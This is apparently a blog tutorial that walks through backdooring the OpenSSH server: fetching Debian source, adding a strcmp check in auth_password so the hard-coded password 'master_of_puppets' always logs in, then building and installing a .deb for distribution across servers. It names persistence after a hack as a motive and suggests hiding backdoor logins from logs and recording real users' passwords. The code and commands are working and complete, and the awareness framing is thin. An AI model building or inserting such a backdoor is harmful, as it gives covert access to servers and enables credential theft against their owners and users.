Backdooring the OpenSSH server
Disclaimer
I’m not responsible for what you do whit this knowledge… bla bla bla, whatever…
This is the serious part: You can break the ssh server and lock yourself out, be careful.
What is openssh-server?
OpenSSH-server is an open-source software that allows users to control their computer/server using an ssh client, this software is widely used by sysadmins to manage their servers.
What exactly are we going to do?
- We are going to download the source code of openssh-server.
- Edit the code to always accept the password “master_of_puppets”
- Compile the code and make a binary package so we can easily distribute it.
Why would you want to backdoor the OpenSSH daemon?
There are a lot of reasons why you would want to do this, here’s some of them:
- Let’s say you want to have a universal password so you can ssh as any user you want using the same password.
- You hate remembering different passwords on thousands of servers you have.
- You hacked the NSA and you want to maintain persistence.
The process
Getting the source code
So the first step is to get the source code of the openssh-server, there are multiple ways of doing this, the main git repository is hosted here git://anongit.mindrot.org/openssh.git but for the sake of simplicity I’m going to download the source code using aptitude (the builtin package manager on Debian), I’m also going to make a separate directory for our project
mkdir /tmp/sin && cd /tmp/sin
apt-get source openssh-serverCoding-in the backdoor
Okay so now we should edit the part of the source code that handles the password login and make it accept our master password. So normally you would have to find the place you want to edit on your own but I cheated found a patch file that automates this whole process on GitHub(I’ll leave the link to it in the bottom of this post) and saw that it patches the ‘auth-passwd.c’ file.
So lets open the ‘auth-passwd.c’ file in our favorite editor and edit some code!
nano /tmp/sin/openssh-7.4p1/auth-passwd.cThe file is quite small so we can easily find the password checking function, because OpenSSH is coded in the C language it’s smart to look for ‘strcmp’ (this function compares two strings), comments can help too :)
So now we know that the ‘auth_password’ function is responsible for checking the password, it takes two arguments:
auth_password(Authctxt *authctxt, const char *password)authctxt is a struct that is defined in auth.h, but we don’t need it.
password is a char array that holds the client’s password.
Ok so we know that this function returns true if the password is correct, let’s add an if statement that compares the password variable with our master password and return true if they match:
if (strcmp(password, "master_of_puppets") == 0)
return 1;Add this code to the beginning of the auth_password function and you’re set.
Now the beginning of the function should look like this:
Compiling the code
Let’s change our working directory to our source directory.
cd /tmp/sin/openssh-7.4p1You will need to install some dependencies to compile the code, if your system is using aptitude it’s as simple as:
apt-get build-dep openssh-serverNow all you have to do is compile! Let’s compile a .deb file so we can install our version of openssh-server on other servers without the need of recompiling it for every server you own:
dpkg-buildpackage -rfakeroot -uc -bInstalling our version of openssh-server
The deb package should now be one directory higher that the source code (in our case it’s in /tmp/sin)
We can now install our package:
dpkg -i openssh-server_7.4p1-10+deb9u2_i386.debThe package name will differ you can use ls to see what files you have in the directory.
Testing
Let’s ssh to ourselves to test if the master password works:
ssh 127.0.0.1Let’s enter our master password and:
We are in!
Final notes
You can improve this by:
- Stop logging of master password logins
- Logging legit user passwords to a file
The purpose of this tutorial was to show you how easy it is to add your own code to open-source software, make you aware of the dangers of backdoors and teach you how to add backdoors to open-source software.